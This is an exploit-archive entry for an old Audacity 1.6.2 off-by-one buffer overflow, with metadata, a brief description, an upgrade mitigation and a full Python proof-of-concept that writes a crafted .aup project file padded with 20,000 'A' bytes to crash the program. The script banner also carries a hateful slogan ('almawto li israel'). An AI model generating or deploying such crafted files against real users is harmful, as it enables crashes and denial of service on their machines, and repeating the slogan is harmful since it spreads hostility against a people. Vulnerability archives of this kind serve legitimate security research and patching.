Audacity 1.6.2 (.aup file ) Remote off by one Crash Exploit

vendor:

Audacity

by:

Mountassif Moad

7.5

CVSS

HIGH

Buffer Overflow

120

CWE

Product Name: Audacity

Affected Version From: 1.6.2002

Affected Version To: 1.6.2002

Patch Exists: YES

Related CWE: N/A

CPE: a:audacity:audacity:1.6.2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP Pro SP2 Fr

2008

Audacity 1.6.2 (.aup file ) Remote off by one Crash Exploit

This exploit is a buffer overflow vulnerability in Audacity 1.6.2. It is triggered when a maliciously crafted .aup file is opened in Audacity. The exploit causes a crash due to an off-by-one error in the handling of the file.

Mitigation:

Upgrade to the latest version of Audacity

Source

Exploit-DB raw data:

#usage: exploit.py
print "**************************************************************************"
print " Audacity 1.6.2  (.aup file ) Remote off by one Crash Exploit\n"
print " Author: Mountassif Moad "
print " the best: Evil finger & v4 Team "
print " Tested on: Windows XP Pro SP2 Fr\n"
print " Greetings to: All friends"
print " almawto li israel\n"
print "**************************************************************************"
         
  
header = (
         "\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72"
         "\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x3f"
         "\x3e\x0d\x0a\x3c\x61\x75\x64\x61\x63\x69\x74"
         "\x79\x70\x72\x6f\x6a\x65\x63\x74\x20\x70\x72"
          "\x6f\x6a\x6e\x61\x6d\x65\x3d\x22"
          )
 
header2 = (
        "\x22\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22"
        "\x31\x2e\x31\x2e\x30\x22\x20\x61\x75\x64\x61"
        "\x63\x69\x74\x79\x76\x65\x72\x73\x69\x6f\x6e"
        "\x3d\x22\x31\x2e\x32\x2e\x36\x22\x20\x73\x65"
        "\x6c\x30\x3d\x22\x30\x2e\x30\x30\x30\x30\x30"
        "\x30\x30\x30\x30\x30\x22\x20\x73\x65\x6c\x31"
        "\x3d\x22\x30\x2e\x30\x30\x30\x30\x30\x30\x30"
        "\x30\x30\x30\x22\x20\x76\x70\x6f\x73\x3d\x22"
        "\x30\x22\x20\x68\x3d\x22\x30\x2e\x30\x30\x30"
        "\x30\x30\x30\x30\x30\x30\x30\x22\x20\x7a\x6f"
        "\x6f\x6d\x3d\x22\x38\x36\x2e\x31\x33\x32\x38"
        "\x31\x32\x35\x30\x30\x30\x22\x20\x72\x61\x74"
        "\x65\x3d\x22\x34\x34\x31\x30\x30\x2e\x30\x30"
        "\x30\x30\x30\x30\x22\x20\x3e\x0d\x0a\x09\x3c"
        "\x74\x61\x67\x73\x20\x74\x69\x74\x6c\x65\x3d"
        "\x22\x22\x20\x61\x72\x74\x69\x73\x74\x3d\x22"
        "\x22\x20\x61\x6c\x62\x75\x6d\x3d\x22\x22\x20"
        "\x74\x72\x61\x63\x6b\x3d\x22\x2d\x31\x22\x20"
        "\x79\x65\x61\x72\x3d\x22\x22\x20\x67\x65\x6e"
        "\x72\x65\x3d\x22\x2d\x31\x22\x20\x63\x6f\x6d"
        "\x6d\x65\x6e\x74\x73\x3d\x22\x22\x20\x69\x64"
        "\x33\x76\x32\x3d\x22\x31\x22\x20\x2f\x3e\x0d"
        "\x0a\x3c\x2f\x61\x75\x64\x61\x63\x69\x74\x79"
        "\x70\x72\x6f\x6a\x65\x63\x74\x3e"
  )
  
buff = "\x41" * 20000
exploit = header + buff + header2
try:
    out_file = open("crash.aup",'w')
    out_file.write(exploit)
    out_file.close()
    raw_input("\nExploit file created!\n")
except:
    print "Error"

# milw0rm.com [2009-01-07]